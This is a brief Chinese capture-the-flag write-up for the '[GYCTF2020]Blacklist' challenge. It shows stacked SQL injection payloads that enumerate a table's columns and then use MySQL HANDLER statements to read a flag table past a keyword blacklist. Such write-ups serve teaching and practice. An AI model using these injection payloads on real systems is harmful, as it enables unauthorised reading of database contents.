[GYCTF2020]Blacklist
1';show columns from `FlagHere`; %23
查看列
过滤了这么多,比强网杯过滤更加严格了
这里我们用到handler这个东西
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#